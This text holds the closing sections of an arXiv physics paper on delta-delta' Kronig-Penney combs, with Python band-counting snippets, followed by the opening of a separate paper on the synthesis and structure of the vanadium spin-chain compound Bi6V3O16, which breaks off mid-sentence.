The energy shift produced by the appearance of $\delta'$ terms with respect to the two-species $\delta$-comb is much bigger for the negative energy bands and the supercritical regimes. In fact, as can be seen from the right plots in Figures \ref{f10}-\ref{f12}, this energy increase of the negative energy bands is such that they end up contained in a forbidden energy gap of the corresponding two-species $\delta$-comb as $w_1$ increases.
\item
It is remarkable that when the comb alternates a $\delta$-well and a $\delta$-barrier (i.e., $w_0$ and $v_0$ have opposite signs, as in Figure \ref{f11}), the lowest negative energy band (localised states) of the two-species $\delta$-comb becomes a positive energy band (propagating states) when one of the $\delta'$-couplings is in the supercritical regime, e.g. $|w_1|\gg1$ (see Figure \ref{f11}, left).
\item
The phenomenon described above happens as well for the excited negative energy band in those cases where there are two negative energy bands, as it is shown in the right plot of Figure \ref{f12}.
\item
Lastly, it is quite interesting to remark on the physical properties of those hybrid combs with two negative energy bands (Figure \ref{f12}). The existence of regions in the space of parameters where one can find two negative energy bands is expected, since the double $\delta$-$\delta'$ potential admits two bound states, as was shown in \cite{MM}. This type of hybrid comb requires very high temperatures to promote charge carriers from the lowest energy band to the first positive energy band, as can be seen from the right plot in Figure \ref{f12}. In fact, an increase of temperature would promote the population of the excited negative energy band, provided that the crystal is not destroyed by such a high temperature. Only in those cases in which the excited negative energy band becomes partially or totally a positive energy band would this first excitation give rise to propagating states in the comb.
\end{itemize}
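Several of the statements above can be checked with a short numerical scan. The sketch below evaluates the secular function at negative energies using the scattering data \eqref{4.3}; the Bloch-type relation $\cos(qa)=\mathrm{Re}\,[e^{-ika}/t(k)]$ is an assumption of this illustration (it plays the role of \eqref{2.11}), and the continuation to $\varepsilon<0$ is performed by symmetrising $e^{-ika}/t(k)$ in $k\to-k$ (which coincides with the real part for real $k$) before setting $k=i\kappa$. Counting the contiguous regions where $|\cos(qa)|\le1$ then reproduces, for the two-species Dirac comb, the single negative band of Figure \ref{f10} and the two negative bands of Figure \ref{f12}.

```python
import cmath

def inv_t(k, w0, w1, v0, v1, d):
    """1/t(k) from Eq. (4.3); the expression extends to complex k."""
    e = cmath.exp(2j * d * k)
    delta = (e * (4 * k * v1 + 1j * v0) * (4 * k * w1 - 1j * w0)
             + (2 * k * (v1 ** 2 + 1) + 1j * v0)
             * (2 * k * (w1 ** 2 + 1) + 1j * w0))
    return delta / (4 * k ** 2 * (v1 ** 2 - 1) * (w1 ** 2 - 1))

def secular(eps, w0, w1, v0, v1, d, a=1.0):
    """cos(q a); the k -> -k symmetrisation of exp(-ika)/t(k) equals its real
    part for real k and provides the real-analytic continuation to eps < 0."""
    k = cmath.sqrt(eps)  # k = i*kappa for eps < 0
    val = 0.5 * (cmath.exp(-1j * k * a) * inv_t(k, w0, w1, v0, v1, d)
                 + cmath.exp(1j * k * a) * inv_t(-k, w0, w1, v0, v1, d))
    return val.real

def negative_bands(w0, w1, v0, v1, d, a=1.0, kap_max=9.0, n=4500):
    """Number of contiguous allowed regions (|cos qa| <= 1) at negative energy."""
    count, inside = 0, False
    for i in range(1, n + 1):
        kap = kap_max * i / n
        ok = abs(secular(-kap ** 2, w0, w1, v0, v1, d, a)) <= 1.0
        if ok and not inside:
            count += 1
        inside = ok
    return count
```

For the Dirac-comb parameters of Figure \ref{f10} ($w_0=-5$, $v_0=-6$, $d=1/3$) the scan finds a single negative band, while for those of Figure \ref{f12} ($w_0=-15$, $v_0=-10$, $d=1/3$) it finds two, as expected from the two bound states of the double $\delta$-$\delta'$ potential.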
\subsection{From two-species to one-species hybrid comb}
In this subsection we analyse the limit in which the displacement of the combs $d$ tends to $0$ or $a$. This limit is of particular interest because, as was shown in \cite{gadella-jpa16}, the superposition of two $\delta$-$\delta'$ potentials at the same point obeys a non-abelian composition law.
To start with, let us recall the basic result from \cite{gadella-jpa16}. Given the potential \eqref{4.1}, the limit $d\to 0$ gives rise to a single $\delta$-$\delta'$ potential
\begin{equation}\label{4.19}
\lim_{d\to0}V_{\delta\delta'}(x)=u_0\,\delta(x)+2u_1\,\delta^\prime (x),
\end{equation}
where the couplings $u_0$ and $u_1$ are given in terms of the couplings $\{w_0,w_1,v_0,v_1\}$ by:
\begin{equation}\label{4.20}
u_0=\frac{v_0(1-w_1)^2+w_0(1+v_1)^2}{(1+v_1w_1)^2}
\,,\quad
u_1= \frac{v_1+w_1}{1+v_1w_1}\,.
\end{equation}
This result can be demonstrated by showing that the limit $d\to 0$ in the scattering data \eqref{4.3}-\eqref{4.5} results in the scattering data for a single $\delta$-$\delta'$ potential \eqref{3.1}-\eqref{3.1.5} with couplings $u_0$ and $u_1$ given by \eqref{4.20}.
\paragraph{The limit $d\to0$.} When we take the limit in which the displacement of the two-species hybrid comb
tends to zero, taking into account the result given by \eqref{4.19} it is straightforward to see that we obtain a one-species hybrid comb with couplings $u_0$ and $u_1$ given by \eqref{4.20}. This case is a direct application of the result obtained in \cite{gadella-jpa16}.
\paragraph{The limit $d\to a$.} In this case, before using the central result from \cite{gadella-jpa16}, we need to rearrange the comb appropriately. Notice that when $d$ gets close to $a$, we can rewrite our original two-species hybrid comb, with the double $\delta$-$\delta'$ potential \eqref{4.1} centered at each point of the linear chain, by exchanging $w_0,w_1\leftrightarrow v_0,v_1$. Accounting for translation invariance, the result of taking $d\to a$ is the one-species comb
\begin{eqnarray}\label{4.22}
\sum_{n=-\infty}^{\infty}\tilde u_0\,\delta(x-na)+2\tilde u_1\,\delta^\prime (x-na)\,,
\end{eqnarray}
where the resulting effective couplings are given by
\begin{equation}\label{4.23}
\tilde u_0=\frac{w_0(1-v_1)^2+v_0(1+w_1)^2}{(1+w_1v_1)^2}\,,\quad
\tilde u_1=u_1= \frac{w_1+v_1}{1+w_1v_1}
\,.
\end{equation}
It is quite remarkable that both limits give rise to a one-species hybrid comb. In both cases the resulting $\delta'$-coupling is the same; nevertheless, each of the limits yields a different $\delta$-coupling.
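The common $\delta'$-coupling can be tested numerically from the printed scattering data alone. Setting $v_0=v_1=0$ in \eqref{4.3} gives the one-species amplitude $t(k)=2k(1-w_1^2)/\left[2k(1+w_1^2)+iw_0\right]$, for which $\mathrm{Re}\,(1/t)=(1+u_1^2)/(1-u_1^2)$ is independent of $k$. Evaluating $1/t$ of the double potential at $d=0$ and reading off $u_1$ from this relation recovers the composite coupling $u_1=(v_1+w_1)/(1+v_1w_1)$ shared by both limits; the illustrative code below does exactly this.

```python
import cmath

def t_two(k, w0, w1, v0, v1, d):
    """Transmission amplitude of the double delta-delta' unit, Eq. (4.3)."""
    e = cmath.exp(2j * d * k)
    delta = (e * (4 * k * v1 + 1j * v0) * (4 * k * w1 - 1j * w0)
             + (2 * k * (v1 ** 2 + 1) + 1j * v0)
             * (2 * k * (w1 ** 2 + 1) + 1j * w0))
    return 4 * k ** 2 * (v1 ** 2 - 1) * (w1 ** 2 - 1) / delta

def effective_u1(k, w0, w1, v0, v1):
    """Read off u1 from Re(1/t) = (1 + u1^2)/(1 - u1^2) at d = 0."""
    R = (1.0 / t_two(k, w0, w1, v0, v1, 0.0)).real
    return ((R - 1.0) / (R + 1.0)) ** 0.5
```

For instance, with $(w_0,w_1,v_0,v_1)=(1,0.3,2,0.4)$ one obtains $u_1=(0.3+0.4)/(1+0.12)=0.625$ for any $k$; the effective $\delta$-coupling can be extracted analogously from the imaginary part of $1/t$ and compared with \eqref{4.20} and \eqref{4.23}.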
\section{Conclusions and further comments}\label{sec_conclusions}
In this paper we have performed a detailed study of a generalised one-dimensional Kronig-Penney model built from $\delta\text{-}\delta'$ potentials. In Section \ref{sec_review} we have reviewed and generalised the formulas for the band spectrum and density of states of periodic potentials built from the superposition of compactly supported potentials centered at the sites of a linear lattice. As an application, we have performed a very detailed study of the band spectrum for a hybrid comb formed by an infinite chain of identical and equally spaced $\delta$-$\delta'$ potentials.
It has been shown in previous works that the $\delta$-$\delta'$ potential
becomes opaque (identically zero transmission amplitude) when the coupling of the $\delta'$ satisfies $w_1=\pm 1$. Moreover, it was demonstrated that for $w_1=\pm 1$ the two sides of the opaque $\delta$-$\delta'$ wall are equivalent to imposing Dirichlet/Robin or Neumann/Robin boundary conditions. In both cases the Robin boundary condition parameter is determined by the Dirac-$\delta$ coupling $w_0$. As a consequence, the most remarkable result of our study of the one-species hybrid comb is that the band spectrum degenerates into a standard discrete spectrum when we set $w_1=\pm1$. Moreover, the addition of $\delta'$ potentials with subcritical coupling ($\vert w_1\vert<1$) yields narrower density-of-states distributions, meaning that the density of states in the continuous spectrum is more concentrated
around the middle of each band compared to the pure Dirac-$\delta$ comb. If the coupling of the $\delta'$ is supercritical ($\vert w_1\vert>1$), the width of the forbidden energy gaps decreases with $\vert w_1\vert$, reaching the free-particle continuum spectrum as $\vert w_1\vert\to\infty$. To summarise, the effect of $\delta'$ interactions perturbing a Dirac-$\delta$ comb is most significant when we look at the curvature of the bands: while we remain in the subcritical regime $\vert w_1\vert<1$ the curvature of the bands stays the same as in the Dirac-$\delta$ comb, but crossing to the supercritical regime $\vert w_1\vert>1$ changes the curvature of the bands (see Figures \ref{Figure44} and \ref{Figure66}).
The conductor/insulator behaviour of the one-species hybrid comb requires a conceptual step forward to study the properties of the system with infinitely many charge carriers (see \cite{BMS1}). In addition, when there are many charge carriers the spin-statistics properties must be accounted for. Our calculation of the density of states enables the computation, in future works, of the thermodynamical properties of these systems whenever the charge carriers are spin-$1/2$ particles or integer-spin particles (typically Cooper pairs).
Lastly, we have repeated the previous analysis for the two-species comb, built as an infinite chain of double $\delta$-$\delta'$ potentials. In addition to the appearance of eight opaque regimes in the space of couplings,
the allowed bands are deformed in interesting ways, even changing their curvature, with respect to the bands of the hybrid Dirac comb with only one species of potential. In this case the most remarkable effect on the curvature of the bands, with respect to the one-species case, is that when both $\delta'$-couplings are in the supercritical regime, i.e. $\vert w_1\vert,\vert v_1\vert>1$, the curvature of the bands remains the same as for the pure Dirac-$\delta$ two-species comb ($w_1=v_1=0$), as can be seen from the figures presented in Subsection~\ref{subsect41}.
\subsection{Further comments}
The connection between these types of dynamical systems and quantum wires was pointed out and developed by Cerver\'o and collaborators in Refs. \cite{KOR,KOR2}, where Dirac-$\delta$ chains are used as a simple model for a quantum wire. Furthermore, when the Dirac-$\delta$ potentials are randomly distributed along the real line, the authors found Anderson localisation and were able to reproduce many of the physical properties expected in a quantum wire \cite{KOR2,KOR3,KOR4}. They obtained further results on this system, such as a realistic absorption pattern in quantum wires when the coupling of the $\delta$-potentials is a complex number with positive imaginary part \cite{KOR3}, taking into account previous results on ${\cal PT}$-symmetric periodic non-hermitian Hamiltonians \cite{KOR5,KOR6}.
The basis of many of the works mentioned above is the fact that the Kronig-Penney comb is a very well studied periodic one-dimensional system. The results presented in this work generalise the Kronig-Penney comb in order to provide a much richer model for quantum wires, where each point-supported potential in the chain contains two free parameters. The main physical consequence of introducing one extra coupling is that it gives rise to a more tuneable band structure. In addition, the study carried out in this paper, where we have accounted for negative Dirac-$\delta$ couplings that give rise to negative energy bands, will make it possible to mimic absorption in the quantum wire when the system is studied in the quantum field theoretical framework at zero and finite temperature \cite{BMS1,BMS2}. In such a framework there is no need to assume complex couplings for the Dirac-$\delta$ to obtain the required unitarity loss. Furthermore, our results make it possible to extend the analysis performed for random distributions of Dirac-$\delta$ chains in the papers mentioned above to more general potentials with point support.
\section*{Acknowledgements}
This work was partially supported by the Spanish Junta de Castilla y Le\'on and FEDER projects (BU229P18 and VA137G18). L.S.S. is grateful
to the Spanish Government for the FPU-fellowships
programme (FPU18/00957).
The authors acknowledge the fruitful discussions with M. Bordag, K. Kirsten, G. Fucci, and C. Romaniega.
| 2024-02-18T23:40:04.191Z | 2020-09-28T02:11:11.000Z | algebraic_stack_train_0000 | 1,241 | 12,277 |
|
proofpile-arXiv_065-6116 | \section{introduction}
Magnetism in one-dimensional (1D) Heisenberg antiferromagnetic
(AFM) spin systems has remained an area of wide interest in condensed-matter physics since the 1970s.~\cite{Lieb1961,Affleck1989}
This is mainly due to the rich physics such spin chains exhibit. Furthermore,
these systems are tractable from both theoretical~\cite{Eggert1994,KuJohnston2000}
and computational~\cite{BF1964,Bonner1979,Alternating chain expression paper_Johnston}
standpoints.
fluctuations which lead to the suppression
of magnetic long range ordering.~\cite{Mermin Wagner prevention of LRO in 1D}
The nature of the ground state in these systems depends on the value
of spin $S$ and relative strength and sign (AFM or ferromagnetic)
of their coupling $J$. The generic magnetic Hamiltonian describing
an $S=\frac{1}{2}$ Heisenberg chain can be written as $H~=~J\sum_{i}\mathbf{S}_{i}\cdot\mathbf{S}_{i+1}$,
where $J$ is the intrachain coupling constant between the nearest-neighbor
spins. A uniform half-integer spin chain with AFM interactions
exhibits a gapless ground state.~\cite{Endoh1974,Nagler1991,Tennant1993,Lake2005,SrCu2O3,Ronnow2013,Ba2Cu(PO4)2-NMR-T1,NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3,Tran2019}
In the case of an AFM alternating Heisenberg chain, the AFM exchange
constants ($J_{1}$ and $J_{2}$) between the two nearest-neighbor
spins are unequal ($J_{1}$$\neq$ $J_{2}$; $J_{1}$, $J_{2}$$>0$),
and they alternate from bond to bond along the chain, with an alternation
parameter $\alpha=J_{2}/J_{1}$.
For half-integer spins, interactions can result in the
opening of a gap via either frustration, due to a next-nearest-neighbor AFM
exchange, or dimerization, due to the alternating coupling to nearest neighbors
along the chain.~\cite{spin gap in alternating spin chain,Bonner1983,
Xu2000,VOPO_Johnston,VOPO_Barnes,VOPO_Garrett,(VO)2P2O7-NR_T1_spin gap,CaCuGe2O6,AgVOAsO4 NMR,Lebernegg2017}
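The qualitative difference between the uniform and the alternating chain can be illustrated by exact diagonalization of small rings. The sketch below is illustrative code (not taken from the works cited): it builds $H=\sum_i J_i\,\mathbf{S}_i\cdot\mathbf{S}_{i+1}$ with $J_i$ alternating between $J_1$ and $J_2=\alpha J_1$ on an even ring and compares the gap between the two lowest levels; already for a small ring, the dimerized chain ($\alpha<1$) shows a markedly larger gap than the uniform one, whose finite-size gap closes as the ring grows.

```python
import numpy as np

def heisenberg_ring(N, J1, J2):
    """H = sum_i J_i S_i . S_{i+1} on an N-site S = 1/2 ring (N even),
    with the bond strengths alternating between J1 and J2."""
    sx = np.array([[0.0, 0.5], [0.5, 0.0]])
    sy = np.array([[0.0, -0.5j], [0.5j, 0.0]])
    sz = np.array([[0.5, 0.0], [0.0, -0.5]])

    def site_op(mat, site):
        # Embed a single-site operator into the full 2^N-dimensional space.
        out = np.eye(1)
        for j in range(N):
            out = np.kron(out, mat if j == site else np.eye(2))
        return out

    H = np.zeros((2 ** N, 2 ** N), dtype=complex)
    for i in range(N):
        J = J1 if i % 2 == 0 else J2
        for s in (sx, sy, sz):
            H += J * site_op(s, i) @ site_op(s, (i + 1) % N)
    return H

def spin_gap(N, alpha):
    """Gap between the two lowest levels, with J_1 = 1 and J_2 = alpha."""
    E = np.linalg.eigvalsh(heisenberg_ring(N, 1.0, alpha))
    return E[1] - E[0]
```

As a sanity check, for the uniform four-site ring the ground-state energy is the textbook value $-2J$, and for $N=8$ the dimerized ring ($\alpha=0.2$) has a clearly larger gap than the uniform one.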
Many $S=\frac{1}{2}$ chain systems have already been reported, and their
characteristics have been interpreted on the basis of such a model.
Some of the most renowned examples in this category are CuCl$_{2}\cdot$2N(C$_{5}$D$_{5}$),~\cite{Endoh1974}
KCuF$_{3}$,~\cite{Nagler1991,Tennant1993,Lake2005} Sr$_{2}$CuO$_{3}$,\cite{SrCu2O3} CuSO$_{4}\cdot$5H$_{2}$O,~\cite{Ronnow2013} Ba$_{2}$Cu(PO$_{4}$)$_{2}$,~\cite{Ba2Cu(PO4)2-NMR-T1} and, recently, (NO)[Cu(NO$_3$)$_3$]~\cite{NOCu(NO3)3-1,NOCu(NO3)3-2,NOCu(NO3)3-3} and Cs$_4$CuSb$_2$Cl$_{12}$~\cite{Tran2019} for uniform and
Cu(NO$_{3}$)$_{2}\cdot$2.5H$_{2}$O,~\cite{Bonner1983,Xu2000}
(VO)$_{2}$P$_{2}$O$_{7}$,\cite{VOPO_Johnston,VOPO_Barnes,VOPO_Garrett,(VO)2P2O7-NR_T1_spin gap}
CaCuGe$_{2}$O$_{6}$,\cite{CaCuGe2O6}
AgVOAsO$_{4}$\cite{AgVOAsO4 NMR}, and Cu$_3$(MoO$_4$)(OH)$_4$\cite{Lebernegg2017}
for alternating $S=\frac{1}{2}$ Heisenberg spin chains.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.056]{Fig1_alfaBVA6Long_scan_pic1_vesta}
\par\end{centering}
\caption{\label{fig:1 uniform chain structure}Left: Possible interaction path
between the magnetic V$^{4+}$ ions in Bi$_{6}$V$_{3}$O$_{16}$
mediated via nonmagnetic V$^{5+}$ ions and oxygen. Right: Top view of
the chains separated by Bi-O layers. }
\end{figure}
Our motivation is to explore new low-dimensional magnetic oxides with
the intention of unraveling novel magnetic properties. In this paper
we report the bulk and local (NMR) studies of the vanadium-based $S=\frac{1}{2}$
uniform spin chain compound Bi$_{6}$V$_{3}$O$_{16}$ (often described also as
Bi$_{4}$V$_{2}$O$_{10.66}$) at low temperatures.
This system is a member of the well-known pseudo-binary oxide family
Bi$_{2}$O$_{3}$-V$_{2}$O$_{5}$, which has received significant interest
because of its different structural varieties and rich functional
properties,~\cite{Reference for Bi2O3-V2O5,First report on Bi4V2O10}
and which also led to the very efficient bismuth-metal-vanadia (BiMeVOX) family of anionic conductors.~\cite{BiMeVOX,SOEC-review}
These systems belong to or are derived from the Aurivillius family.~\cite{Aurivillius_1,Aurivillius_2}
They exhibit three polymorphs, $\alpha$, $\beta$, and $\gamma$, each
associated with a different temperature range, where the $\alpha$ phase
is the low-temperature one. One of these Aurivillius vanadates,
Bi$_{4}$V$_{2}$O$_{10}$, which contains all the vanadium ions in
the V$^{4+}$ oxidation state, was studied thoroughly about
two decades ago through its crystal structure, electron diffraction, and thermodynamic properties.\cite{Bi4V2O10_structure,Bi4V2O10_chain structure}
In the $\alpha$ phase of Bi$_{4}$V$_{2}$O$_{10}$, the magnetic
V$^{4+}$ ions are arranged in a 1D chain along the $a$ direction
of the unit cell (see Fig.~\ref{fig:1 uniform chain structure};
\href{http://jp-minerals.org/vesta/en/}{\textsc{vesta}}
software~\cite{vesta} was used for crystal structure visualization).
It was also proposed by Satto \textit{et al.}\cite{Bi4V2O10_chain structure}
that $\alpha-$Bi$_{4}$V$_{2}$O$_{10}$ transforms to $\alpha-$Bi$_{6}$V$_{3}$O$_{16}$
after oxidation upon exposure to air at room temperature. The orientation
of the magnetic V$^{4+}$ ions in 1D chains remains intact in the
crystal structure of the $\alpha$ phase of Bi$_{6}$V$_{3}$O$_{16}$,
which is best described by V$_{3}$O$_{16}^{6-}$ ribbons running along
the $a$ axis and containing units built up from a pyramid (V$^{4+}$)
and two tetrahedra (V$^{5+}$).~\cite{Bi4V2O10.66_crystal structure,Bi4V2O11 to Bi4V2O10.66}
This is one of the few systems found so far in which the extended superexchange
interaction proceeds through the overlap of the $d_{xy}$ orbitals (via the oxygen $p$ orbitals)
of the $d^{1}$ ($t_{2g}$) electrons of V$^{4+}$ ions, rather than through the $d_{x^{2}-y^{2}}$
orbitals of $e_{g}$ electrons as in Cu-based systems, with an exchange coupling $J/k_B$ as high as $\sim100$~K.
Very recently, magnetic properties and charge ordering were reported
for another related compound, Bi$_{3.6}$V$_{2}$O$_{10}$,\cite{Ref.19_magnetic measurement-BiV2O5_2013,BiV2O5_Oct 2015_paper}
which also belongs to the aforementioned Aurivillius family. However,
a detailed investigation of the bulk and local properties with a proper
theoretical model has not been carried out for any of these magnetic
Aurivillius vanadates. This provides the primary motivation
for our present work.
\section{Sample preparation, crystal structure, and experimental details}
Bi$_{6}$V$_{3}$O$_{16}$ is an orthorhombic system and crystallizes in
the $Pnma$ space group.~\cite{Bi4V2O10.66_crystal structure} The
low-temperature phase of Bi$_{6}$V$_{3}$O$_{16}$ was synthesized
by mixing stoichiometric amounts of Bi$_{2}$O$_{3}$ (Alfa Aesar, $99.99\%$)
and VO$_{2}$. VO$_{2}$ was prepared through the reaction of an equimolar mixture
of V$_{2}$O$_{5}$ and V$_{2}$O$_{3}$ at $680$\textdegree{}C
for $18$~h under vacuum. V$_{2}$O$_{3}$ was obtained by reducing
V$_{2}$O$_{5}$ ($99.99\%$, Aldrich) under hydrogen flow at $800$\textdegree{}C.
The mixture of Bi$_{2}$O$_{3}$ and VO$_{2}$ was then pelletized
and placed in a quartz ampule sealed under vacuum ($<10^{-5}$~mbar).
The ampule was annealed at $550$\textdegree{}C for $48$~h. This process was repeated
three times with intermediate grinding and mixing. The last round
of heating was performed at $620$\textdegree{}C for $36$~h.
After a few weeks of exposure in open air, Bi$_{4}$V$_{2}$O$_{10}$ self-oxidized
into Bi$_{6}$V$_{3}$O$_{16}$, and its color changed from black to dark brown.
A similar transformation was observed previously by Satto \textit{et al.}\cite{Bi4V2O10_chain structure}
Energy-dispersive x-ray (EDX) microanalysis shows a bismuth-to-vanadium
elemental ratio of Bi:V$\simeq2:1$ (see
Fig.~\ref{fig2:EDX&SEM_ Fig2}).
\begin{figure}
\begin{centering}
\includegraphics[scale=0.5]{Fig2_EDX}
\par\end{centering}
\caption{\label{fig2:EDX&SEM_ Fig2}EDX spectrum (top) and SEM image (bottom)
of polycrystalline Bi$_{6}$V$_{3}$O$_{16}$.}
\end{figure}
X-ray diffraction (XRD) patterns were collected using
a PANalytical X'Pert$^3$ Powder x-ray diffractometer (Cu $K \alpha$
radiation, $\lambda=1.54182$~\AA).
The
Rietveld refinement against the XRD data was carried out using the \textsc{jana}2006
software\cite{JANA2006}(see Fig.~\ref{fig3:xrda+Alfa_refinement}).
The XRD pattern shows a single phase of Bi$_{6}$V$_{3}$O$_{16}$ [space
group $Pnma$ (No.~62),
$a=5.47124(3)$~\AA,
$b=17.25633(8)$~\AA,
$c=14.92409(6)$~\AA].
The ratio of $c/(b/3)\simeq2.6$ obtained from the refinement is consistent
with the previous study carried out on single crystals of the $\alpha$ phase
of Bi$_{6}$V$_{3}$O$_{16}$.~\cite{Bi4V2O11 to Bi4V2O10.66}
The refined atomic coordinates of Bi$_{6}$V$_{3}$O$_{16}$ are given
in Table \ref{atomic positions_alfa}.
\begin{figure}
\begin{centering}
\includegraphics[scale=0.11]{Fig3_XRD_Valera}
\par\end{centering}
\caption{\label{fig3:xrda+Alfa_refinement}
Experimental (black points) and calculated (red line) powder XRD patterns of Bi$_{6}$V$_{3}$O$_{16}$.
Positions of peaks are given by black ticks, and the difference plot is shown
by the black line in the bottom part. }
\end{figure}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|c|c|}
\hline
Atoms & \multicolumn{1}{c}{} & \multicolumn{1}{c}{Coordinates} & \multicolumn{1}{c|}{} & TDP \tabularnewline
\hline
& $x/a$ & $y/b$ & $z/c$ & $B_{iso}$ (\AA$^{2}$)\tabularnewline
\hline
Bi1($4c$) & $0.2004(7)$ & $0.250$ & $0.31668(17)$ & $2.13(7)$\tabularnewline
\hline
Bi2($4c$) & $0.2519(7)$ & $0.250$ & $0.66949(17)$ & $2.08(8)$\tabularnewline
\hline
Bi3($8d$) & $0.2368(4)$ & $0.41275(14)$ & $0.83414(13)$ & $1.98(6)$\tabularnewline
\hline
Bi4($8d$) & $0.2835(5)$ & $0.42850(12)$ & $0.16763(14)$ & $2.25(6)$\tabularnewline
\hline
V1($4c$) & $0.246(3)$ & $0.250$ & $0.0331(7)$ & $4.1(3)$\tabularnewline
\hline
V2($8d$) & $0.265(2)$ & $0.3864(4)$ & $0.4874(6)$ & $3.8(2)$\tabularnewline
\hline
O1($4c$) & $-0.030(4)$ & $-0.0171(15)$ & $0.2391(15)$ & $0.5(2)$\tabularnewline
\hline
O2($8d$) & $0.127(4)$ & $0.3523(13)$ & $0.2921(11)$ & $0.5(2)$\tabularnewline
\hline
O3($8d$) & $0.010(6)$ & $0.323(2)$ & $0.7464(15)$ & $0.5(2)$\tabularnewline
\hline
O4($8d$) & $-0.018(6)$ & $0.3226(17)$ & $0.0536(10)$ & $0.5(2)$\tabularnewline
\hline
O5($4a$) & $-0.015(6)$ & $0.331(2)$ & $0.4704(9)$ & $0.5(2)$\tabularnewline
\hline
O6($8d$) & $0.287(4)$ & $0.4056(14)$ & $0.5912(10)$ & $0.5(2)$\tabularnewline
\hline
O7($8d$) & $0.207(5)$ & $0.4749(11)$ & $0.4325(10)$ & $0.5(2)$\tabularnewline
\hline
O8($8d$) & $0.316(6)$ & $0.250$ & $0.1752(16)$ & $0.5(2)$\tabularnewline
\hline
O9($8d$) & $0.178(6)$ & $0.250$ & $0.8582(15)$ & $0.5(2)$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\centering{}\caption{\label{atomic positions_alfa} Atomic coordinates and thermal
displacement parameters in the crystal structure of Bi$_{6}$V$_{3}$O$_{16}$.}
\end{table}
Thermogravimetric analysis (TGA) was carried out by heating
Bi$_{6}$V$_{3}$O$_{16}$ and oxidizing it while monitoring the weight change
(see Fig.~\ref{fig:TGA_heating}). After full oxidation, Bi$_{6}$V$_{3}$O$_{16}$
(Bi$_{4}$V$_{2}$O$_{10.66}$) should transform into Bi$_{4}$V$_{2}$O$_{11}$,
in which all vanadium ions are in the V$^{5+}$ oxidation state. In our experiments,
we observed three major temperature effects. The first one at $550$~K
is due to the oxygen intake, the second one at $720$~K
is due to the $\alpha\to\beta$ transition, and the last one at $860$~K is
due to the $\beta\to\gamma$ phase transition. The measured
mass change during the oxidation step at $550$~K
is $0.65\%$, which is close to what is expected
for the oxidation of Bi$_{6}$V$_{3}$O$_{16}$ to Bi$_{4}$V$_{2}$O$_{11}$
($0.5\%$).
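The quoted expected value can be cross-checked from the stoichiometry: Bi$_{4}$V$_{2}$O$_{10.66}$ takes up $1/3$ of an oxygen atom per formula unit upon oxidation to Bi$_{4}$V$_{2}$O$_{11}$. A minimal sketch of this arithmetic (standard atomic masses assumed):

```python
# Expected mass gain for Bi4V2O10.67 -> Bi4V2O11 (uptake of 1/3 O per f.u.)
M_BI, M_V, M_O = 208.980, 50.942, 15.999   # standard atomic masses, g/mol

m_start = 4 * M_BI + 2 * M_V + (32.0 / 3.0) * M_O  # Bi4V2O10.67 molar mass
delta_o = (11.0 - 32.0 / 3.0) * M_O                # mass of 1/3 O atom
gain_pct = 100.0 * delta_o / m_start               # ~0.48%, i.e. ~0.5%
```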
\begin{figure}
\begin{centering}
\includegraphics[scale=0.48]{Fig4_TGA_heating}
\par\end{centering}
\caption{\label{fig:TGA_heating}Temperature dependence of the mass change
and the heat flow during heating of Bi$_{6}$V$_{3}$O$_{16}$ in
the TGA experiment.}
\end{figure}
Analysis of the V-V interaction path (see Fig.~\ref{fig:1 uniform chain structure})
reveals that two vanadium ions from crystallographic
site V$1$ (magnetic V$^{4+}$) are connected by two oxygen ions and
one vanadium from crystallographic site V$2$ (nonmagnetic V$^{5+}$).
The magnetic interaction between the V$^{4+}$ ions is hence an
extended superexchange (V$^{4+}$-O$^{2-}$-V$^{5+}$-O$^{2-}$-V$^{4+}$).
The V-V distances are equal along the chains. V$^{4+}$ and V$^{5+}$
ions are in the pyramidal and tetrahedral environments of oxygens,
respectively (see Fig. \ref{fig:1 uniform chain structure}).
The bond distances and bond angles along the V-V interaction
path for Bi$_{6}$V$_{3}$O$_{16}$ are listed in Tables \ref{tab3:Bond-lengths alfa}
and \ref{tab4:Bond-angles alfa}, respectively. From the structural point of view,
the system resembles an $S=\frac{1}{2}$ uniform 1D Heisenberg chain.
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|}
\hline
Bonds & Description & Value (\AA)\tabularnewline
\hline
\hline
V$1$-O$5$ & intrachain & 1.92\tabularnewline
\hline
O$5$-V$2$ & intrachain & $1.82$\tabularnewline
\hline
V$2$-O$4$ & intrachain & $1.73$\tabularnewline
\hline
O$4$-V$1$ & intrachain & $1.94$\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\centering{}\caption{\label{tab3:Bond-lengths alfa}Bond lengths between various vanadium-oxygen
linkages along the $a$ direction of the 1D chain in Bi$_{6}$V$_{3}$O$_{16}$.}
\end{table}
\begin{table}
\begin{centering}
\begin{tabular}{|c|c|c|}
\hline
Angles & Description & Value (deg)\tabularnewline
\hline
\hline
V$1$-O$5$-V$2$ & intrachain & 163.97\tabularnewline
\hline
O$5$-V$2$-O$4$ & intrachain & 101.07\tabularnewline
\hline
V$2$-O$4$-V$1$ & intrachain & 150.15\tabularnewline
\hline
\end{tabular}
\par\end{centering}
\caption{\label{tab4:Bond-angles alfa}Bond angles between various vanadium-oxygen
linkages in Bi$_{6}$V$_{3}$O$_{16}$.}
\end{table}
Recent reports\cite{BiV2O5_Oct 2015_paper} on the crystallographic
data for the similar compounds Bi$_{4}$V$_{2}$O$_{10.2}$ and Bi$_{3.6}$V$_{2}$O$_{10}$
document that V$^{4+}$ ions occupy the V$1$ site, and V$^{5+}$
ions are placed on the V$2$ sites. Bi$_{6}$V$_{3}$O$_{16}$
is derived from the same Aurivillius family, having a similar composition and preparation route.
Here as well, V$^{4+}$ ions and V$^{5+}$ ions occupy the V$1$ and V$2$
sites, respectively.
The field (up to 14~T) and temperature ($2-300$~K) dependences
of the heat capacity and
magnetization $M$ were measured using the
heat capacity and vibrating-sample magnetometer options of a Quantum Design physical
property measurement system, respectively.
The magic angle spinning nuclear magnetic resonance (MAS-NMR) measurements
(spectra and nuclear spin-lattice relaxation times $T_{1}$) were carried out on vanadium
nuclei ($^{51}$V gyromagnetic ratio $\gamma/2\pi=11.1921$~MHz\,T$^{-1}$
and nuclear spin $I=7/2$) in the fixed field of a $4.7$-T magnet
using an AVANCE-II Bruker spectrometer. The spinning speed of the $1.8$-mm o.d. rotor
was varied between $20$ and $30$~kHz.\cite{MAS-NMR reference}
Typical pulse widths varied from $2$ to $4$~$\mu$s. In the echo
